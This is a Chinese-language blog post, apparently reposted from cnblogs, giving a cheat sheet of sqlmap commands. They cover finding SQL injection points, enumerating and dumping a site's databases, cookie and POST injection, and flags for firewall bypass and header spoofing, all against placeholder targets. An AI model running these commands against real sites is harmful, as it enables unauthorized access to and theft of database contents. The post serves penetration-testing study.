一般的資料庫注入步驟:
1. sqlmap -u "http://www.xx.com?id=x" 【查詢是否存在注入點 2. --dbs 【檢測站點包含哪些資料庫 3. --current-db 【獲取當前的資料庫名 4. --tables -D "db_name" 【獲取指定資料庫中的表名 -D后接指定的資料庫名稱 5. --columns -T "table_name" -D "db_name" 【獲取資料庫表中的欄位 6. --dump -C "columns_name" -T "table_name" -D "db_name" 【獲取欄位的資料內容
Cookie注入:
sqlmap -u "http://www.xx.com?id=x" --cookie "cookie" --level 2 【cookie注入 后接cookie值
POST注入:
(1)目標地址http:// www.xxx.com /login.asp (2)打開brup代理, (3)點擊表單提交 (4)burp獲取攔截資訊(post) (5)右鍵保存檔案(.txt)到指定目錄下 (6)運行sqlmap并執行如下命令: 用例:sqlmap -r okay.txt -p username -r表示加載檔案(及步驟(5)保存的路徑),-p指定引數(即攔截的post請求中表單提交的用戶名或密碼等name引數) (7)自動獲取表單:--forms自動獲取表單 例如:sqlmap -u www.xx.com/login.asp --forms (8)指定引數搜索:--data 例如:sqlmap -u www.xx.com/login.asp --data "username=1"
SQLMAP常用的命令:
1. --purge 【重新掃描(--purge 洗掉原先對該目標掃描的記錄) 2. --tables 【獲取表名 3. --dbs 【檢測站點包含哪些資料庫 4. --current-db 【獲取當前的資料庫名 5. --current-user 【檢測當前用戶 6. --is-dba 【判斷站點的當前用戶是否為資料庫管理員 7. --batch 【默認確認,不詢問你是否輸入 8. --search 【后面跟引數 -D -T -C 搜索列(C),表(T)和或資料庫名稱(D) 9. --threads 10 【執行緒,sqlmap執行緒最高設定為10 10. --level 3 【sqlmap默認測驗所有的GET和POST引數,當--level的值大于等于2的時候也會測驗HTTP Cookie頭 的值,當大于等于3的時候也會測驗User-Agent和HTTP Referer頭的值,最高為5 11. --risk 3 【執行測驗的風險(0-3,默認為1)risk越高,越慢但是越安全 12. -v 【詳細的等級(0-6) 0:只顯示Python的回溯,錯誤和關鍵訊息, 1:顯示資訊和警告訊息, 2:顯示除錯訊息, 3:有效載荷注入, 4:顯示HTTP請求, 5:顯示HTTP回應頭, 6:顯示HTTP回應頁面的內容 13. --privileges 【查看權限 14. --tamper xx.py,cc.py 【防火墻繞過,后接tamper庫中的py檔案 15. --method "POST" --data "page=1&id=2" 【POST方式提交資料 16. --threads number 【采用多執行緒 后接執行緒數 17. --referer "" 【使用referer欺騙 18. --user-agent "" 【自定義user-agent 19. --proxy “目標地址″ 【使用代理注入
Kali系統集成的SQLMAP工具目錄:
sqlmap常用路徑:
1. 添加表欄位的目錄在sqlmap/txt/common-tables.txt
2. 存放掃描記錄的目錄在sqlmap/output
本文來自博客園,作者:ZhaoYXiang22,轉載請注明原文鏈接:https://www.cnblogs.com/zhaoyunxiang/p/16056629.html
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/449771.html
標籤:其他
上一篇:IDEA快捷鍵大全